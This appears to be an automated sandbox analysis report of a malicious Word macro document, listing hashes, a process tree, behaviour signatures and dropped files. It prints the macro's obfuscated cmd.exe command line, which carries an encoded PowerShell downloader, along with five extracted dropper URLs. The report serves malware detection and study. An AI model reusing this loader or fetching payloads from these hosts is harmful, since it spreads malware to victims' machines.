Analysis

  • max time kernel
    140s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23-05-2024 10:53

General

  • Target

    JHL_D_3392853_28_08_2018.doc

  • Size

    83KB

  • MD5

    e4625136904c387f83100ce9861b2e21

  • SHA1

    3b29428a6cea904abd2903d5623fd7094914fec6

  • SHA256

    8db36a2bb5a769e6d5f1598734a7f26fcabed65197a0463a3ff1cc1486953d3c

  • SHA512

    191b87540c3f9d8ae06dd0532e22dafab46f2ab247a682f40f1a5a7bbdaa5e3b14e900a9195ef1077421695f9dfa3525d3a2b950a4eece65ad9200d0b4eebd9d

  • SSDEEP

    1536:JptJlmrJpmxlRw99NBO+aA7IrlnKchqXN076KC0It4oC:3te2dw99fx2vR1It4

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    http://aliu-rdc.org/QwWKYJxM
    http://2idiotsandnobusinessplan.com/wC7
    http://7naturalessences.com/DFaSvtrS
    http://benimdunyamkres.com/v0vig1G1
    http://hostmktar.com/mP

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\JHL_D_3392853_28_08_2018.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3508
    • C:\Windows\SYSTEM32\CMd.exe
      CMd /v/r " ^sE^T ^ ^h^q^x==^=^A^Ag^AA^I^AACA^g^AA^IAAC^A^g^AAIAAC^A^gA^A^I^A^ACAg^AA^I^AACAgA^AI^A^0^H^A9Bw^e^Ag^G^AjBA^dAEGA^jBQf^As^D^ArB^QYA^UG^Ay^B^g^Y^As^D^A^O^B^wQ^A^Y^E^A^k^AAI^A0GA^lB^A^d^A^k^EAt^AQZ^AsGAvB^g^d^A^4G^AJ^Bw^OA^kC^AOBw^QAYEA^kAA^IAwCATB^Aa^AY^E^A^k^AAK^AUG^A^s^B^QaAYE^AkBQ^YA8^G^As^BgbAcHAv^B^AR^A^4C^A^y^BQ^Q^A^o^G^AkAweA^kH^A^y^B^A^dA^s^HAp^A^gT^A8^GA^GB^AJA^ACA^uBQ^a^A^ACATBAa^AYE^A^k^A^A^KAgG^A^jB^QYA^UG^AyBwbAY^GA^7^A^wJA^U^G^A4^B^QZA^4CAn^AwKAYGA2^B^A^U^A^QC^ArAwJ^Aw^FAn^A^wK^A^M^GA^pBA^b^A^I^G^A1B^AcAoD^A^2^Bg^b^A^U^GA^kAQPA4E^AD^B^gR^AQCA^7Aw^J^A^ADA^x^A^wN^AcCA^g^A^Q^P^A^ACAmBg^dAA^F^A^k^AwO^A^kC^AnAA^QAcCAoA^Ad^AkG^A^sBAc^AMFA^u^Aw^JAAF^A^t^B^wL^A0GAv^Bw^YA^4CAyBQ^YAQHAr^B^Q^bA^Q^HAzB^w^bAg^GAvAw^LA^o^DA^w^B^AdA^QHA^o^BAQAED^A^HBQM^AcGAp^Bgd^A^A^DA2^BwL^A0^GAvB^w^Y^A4C^AzBQZ^AI^HArB^Q^bA^EGA^5B^g^b^A^UH^Ak^BQb^Ak^GAuBQ^ZA^I^G^Av^AwL^A^oD^A^w^BAdA^Q^H^A^o^BAQ^A^MF^AyB^A^dA^YH^ATBQY^A^YE^AE^B^wLA^0^G^AvBw^Y^A^4C^Az^BQ^ZAMGAu^B^Q^Z^AMH^AzB^Q^ZAw^G^A^h^Bgc^A^UH^A0B^QYA4^GA^3Aw^L^A8CA6A^Ac^AQ^H^A0^B^A^a^AA^E^A3^A^wQ^AcH^AvAQ^b^A^8^G^A^j^B^g^LA4^G^AhBAb^AA^H^A^z^B^wc^A^U^GA^uB^Qa^A^MHA1B^g^YA^8G^A^uBA^ZA4G^Ah^B^wc^A^QHAvB^Qa^AQ^GA^p^B^g^M^A^8CAv^A^g^O^AAHA0BA^d^A^gG^A^ABQ^T^AgHA^KB^QW^A^sEAX^Bwd^A^EF^Av^A^wZ^A^I^H^AvB^g^LAM^GA^k^BgcA0C^A1B^Q^a^A^wG^A^h^B^w^L^A^8C^A^6^AAcA^QHA^0^BA^a^AcCA9^A^g^T^A^8^G^AG^B^A^J^AsD^A^0BgbA^U^G^Ap^BAb^AM^EAi^BQ^Z^AcFAu^A^AdAU^GA^O^BAIA^QH^A^j^BQZ^A^o^GAi^B^w^bA^0C^A^3BQZA^4^GA^9A^gc^AEEAqB^AJ ^e- ^l^le^h^sr^ewop& ^F^Or /^l %^Y ^In (^ ^9^8^9^ ^ ^ ^-^1 ^0)D^O ^s^E^t u^j^L^a=!u^j^L^a!!^h^q^x:~%^Y, 1!&^iF %^Y == ^0 CA^L^L %u^j^L^a:~^-^99^0% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e [encoded command elided]
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4380
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:3436

Network

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_alttsyfi.1e5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Public\710.exe

      Filesize

      7KB

      MD5

      b8c6ad4b788e720c6b7b4fab70b81ad4

      SHA1

      d0eba959434bd8dd359701789cf577b52f448be0

      SHA256

      925d31f83e732cea00ab6bccd98966ca16496864f65936b187a908b822594a15

      SHA512

      649a5d44c4307d2379c1c85352972c7013c7f720cec475b3e7a2a48ec513bb1c1bcd7a1021bd3c3fb46db2ab5dec0eddf9416ef92a63fb56dc586f5a897e5d6a

    • memory/3508-27-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-80-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-0-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-5-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-7-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-8-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-6-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-9-0x00007FFE89080000-0x00007FFE89090000-memory.dmp

      Filesize

      64KB

    • memory/3508-11-0x00007FFE89080000-0x00007FFE89090000-memory.dmp

      Filesize

      64KB

    • memory/3508-1-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-4-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-3-0x00007FFECB84D000-0x00007FFECB84E000-memory.dmp

      Filesize

      4KB

    • memory/3508-26-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-28-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-2-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-55-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-56-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-57-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/3508-76-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-77-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-79-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/3508-78-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/4380-38-0x0000022573D40000-0x0000022573D62000-memory.dmp

      Filesize

      136KB